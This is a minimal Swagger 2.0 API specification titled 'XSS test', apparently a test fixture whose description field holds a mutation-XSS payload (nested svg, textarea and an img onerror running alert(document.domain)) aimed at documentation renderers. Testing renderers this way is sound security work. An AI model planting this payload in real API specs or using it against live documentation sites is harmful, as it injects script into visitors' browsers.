swagger: "2.0"
info:
  title: "XSS test"
  version: "1.0.0"
  description: |
    <svg></p><textarea><a id="</textarea><img src=1 onerror=alert(document.domain)>">
paths:
  /x:
    get:
      responses:
        "200": { description: "OK" }
